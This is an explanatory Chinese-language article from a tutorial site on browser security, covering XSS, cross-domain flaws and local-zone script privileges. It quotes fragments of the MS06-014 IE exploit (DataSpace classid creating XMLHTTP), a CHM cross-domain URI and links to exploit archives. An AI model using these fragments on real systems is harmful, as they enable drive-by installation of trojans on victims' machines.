萬盛學電腦網

 萬盛學電腦網 >> 病毒防治 >> 浏覽器的防木馬,防病毒問題

浏覽器的防木馬,防病毒問題

現在浏覽器安全的噱頭:防釣魚、防惡意腳本、防溢出型網頁木馬。
目前薄弱的一塊:跨站腳本漏洞、跨域腳本漏洞
未來的http://.浏覽器對於跨域安全的加強升級將是一個重點發展方向。
補充: IE8 開始添加 XSS Filter 功能 和跨域安全函數 toStaticHTML () 等。
  • 跨站和跨域漏洞的區別

跨站漏洞是 WEB 程序的漏洞,黑客可以在遠程的站點域內任意頁面寫入腳本內容運行。
跨域漏洞是浏覽器的漏洞 ,黑客可以在本地域、遠程域獲得相應的權限,然後利用得到的權限運行腳本發起攻擊。

  • 跨站腳本漏洞的本質
  • 持久型 XSS
  • 非持久型 XSS
  • DOM XSS

從 IE8 的安全更新可以看出,雖然 XSS 漏洞是 WEB 程序漏洞,但仍屬於浏覽器的跨域安全問題范圍。

  • 跨站腳本漏洞能做到什麼

傳統的跨站腳本漏洞,劫持用戶和 WEB 程序之間的會話或釣魚攻擊。
跨站腳本漏洞是跨域腳本漏洞的一個子集,浏覽器底層接口對於同一個域內的腳本安全限制很小,可以導致跨頁面的腳本注入。

  • 本地域的腳本權限

本地域的腳本權限按文件的權限分為兩種:可執行文件權限和 HTML 文檔權限。
HTML 文檔權限可以使用 XmlHttp 對象讀取本地的任意文件,利用系統的安全特性可以運行本地任意可執行文件。
HTA,VBS 等可執行文件權限可以使用 WshShell 對象等做任何事情。

  • 跨域漏洞的本質

1.Ms06014 漏洞 ,利用 DataSpace 對象 , 獲取了本地域可執行文件權限運行腳本。
2.CHM 木馬,利用浏覽器協議漏洞,獲取本地域 HTML 文檔權限運行木馬。
3. 百度超級搜霸漏洞, ActiveX 組件設計沒有考慮域安全。
4. 利用軟件的設計缺陷或者浏覽器漏洞,在本地域的 HTML 文檔注入腳本運行,獲取相應的權限。

  • Ms06014 漏洞

http://www.milw0rm.com/exploits/2052
漏洞關鍵:
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
str="Microsoft.XMLHTTP“
Set x = df.CreateObject(str,"")

  • CHM 木馬

http://www.securityfocus.com/bid/9658/exploit
IE 未名 CHM 協議漏洞
ms-its:mhtml:file://C:ss.MHT!http://www.example.com//chm.chm::/files/launch.htm
mk:@MSITStore: mk-its: its: 等幫助文件協議存在跨域漏洞。

  • 百度超級搜霸漏洞

http://www.xfocus.net/articles/200708/933.html
ActiveX 組件設計沒有考慮域安全,使用組件自身的 UPDATE 功能,下載運行木馬。

IE6 0DAY 和第三方浏覽器跨域漏洞
IE6 0DAY
IE 內核的安全接口對偽協議的限制有疏漏。
第三方浏覽器跨域漏洞
軟件自身的設計或功能出現缺陷。
演示跨域漏洞導致的浏覽器劫持攻擊。

總結
現在浏覽器還沒能防住所有的跨域攻擊。
1. 跨站攻擊腳本非傳統的惡意腳本。
2. 浏覽器底層接口漏洞,大部分都是 0DAY 漏洞。
3. 第三方浏覽器設計上的疏漏導致的安全問題。
4. 部分問題不被重視,還未達到大規模的利用程度。

浏覽器的防木馬,防病毒問題.
copyright © 萬盛學電腦網 all rights reserved